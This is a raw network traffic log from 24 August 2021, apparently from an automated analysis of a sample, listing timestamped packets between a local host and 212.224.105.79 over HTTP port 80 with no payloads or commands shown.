Aug 24, 2021 08:46:56.310306072 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.310316086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310332060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310347080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310358047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.310364008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310379982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310388088 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.310409069 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.310415030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310436964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310456991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310882092 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.310889959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310894966 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.310908079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310925007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310940027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310956955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310978889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310995102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.311002970 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.311012983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.311017036 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.311023951 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.311057091 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333039999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333067894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333085060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333105087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333122969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333139896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333157063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333173990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333189964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333204985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333209038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333225965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333247900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333266020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333271027 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333283901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333300114 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333300114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333319902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333328009 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333337069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333353996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333369970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333373070 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333390951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333410025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333411932 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333427906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333435059 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333446026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333462954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333472013 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333479881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333496094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333512068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333512068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333530903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333539009 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333549976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333566904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333574057 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333584070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333600998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333611965 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333617926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333635092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333646059 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333652020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333672047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333673000 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333689928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333708048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333723068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333731890 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333741903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333758116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333769083 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333775043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333791971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333795071 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333811998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333822966 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333831072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333847046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333847046 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333863020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333879948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333889961 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333895922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333911896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333930969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333937883 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333955050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333969116 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.333981037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.333997965 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.334002972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.334023952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.334037066 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.334043980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.334064960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.334101915 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.334311962 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.356719971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.356761932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.356789112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.356812000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.356836081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.356859922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.356872082 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.356883049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.356904984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.356926918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.356954098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.356964111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.356978893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357002020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357024908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357047081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357054949 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357069969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357089043 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357091904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357112885 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357114077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357150078 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357208014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357233047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357254982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357275963 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357276917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357304096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357327938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357331038 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357350111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357358932 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357373953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357400894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357422113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357429981 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357445002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357465029 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357466936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357492924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357517958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357534885 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357539892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357558966 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357563019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357585907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357606888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357624054 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357629061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357650042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357657909 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357677937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357697010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357701063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357722998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357739925 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357744932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357770920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357791901 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357812881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357835054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357851982 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357856989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357880116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357898951 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357899904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357922077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357944012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357964993 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.357971907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357995987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.357999086 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.358017921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.358036995 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.358040094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.358062983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.358081102 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.358083010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.358105898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.358127117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.358128071 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.358153105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.358161926 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.358176947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.358198881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.358221054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.358230114 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.358242989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.358263969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.358268023 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.358310938 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.358575106 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.380861044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.380897045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.380913973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.380929947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.380945921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.380961895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.380976915 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.380980968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.380996943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381016970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381033897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381050110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381057978 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381067991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381083965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381100893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381108999 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381119013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381128073 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381135941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381158113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381175995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381185055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381192923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381208897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381212950 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381226063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381237984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381249905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381262064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381273985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381285906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381298065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381310940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381323099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381337881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381355047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381367922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381383896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381383896 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381401062 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381417990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381424904 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381434917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381452084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381462097 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381472111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381489992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381498098 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381508112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381524086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381531954 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381541967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381557941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381570101 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381617069 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381623030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381639957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381658077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381664038 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381669998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381684065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381695986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381709099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381721973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381735086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381747007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381764889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381781101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381789923 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381798029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381813049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381829023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381849051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381860971 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381865025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381885052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381895065 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381902933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381918907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381922960 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.381934881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381951094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.381963015 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.382014990 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.383569956 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.403999090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404028893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404041052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404055119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404072046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404088020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404104948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404122114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404139996 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.404145002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404162884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404181004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404196978 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404210091 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.404215097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404237986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404256105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404268026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404283047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.404284954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404287100 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.404298067 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404318094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404330015 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.404336929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404355049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404376030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404386044 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.404393911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404409885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404417992 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.404428005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404444933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404453039 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.404465914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404474974 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.404485941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404501915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404511929 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.404520035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404536009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404551983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404570103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.404577017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.404587030 CEST	80	49715	212.224.105.79	192.168.2.7
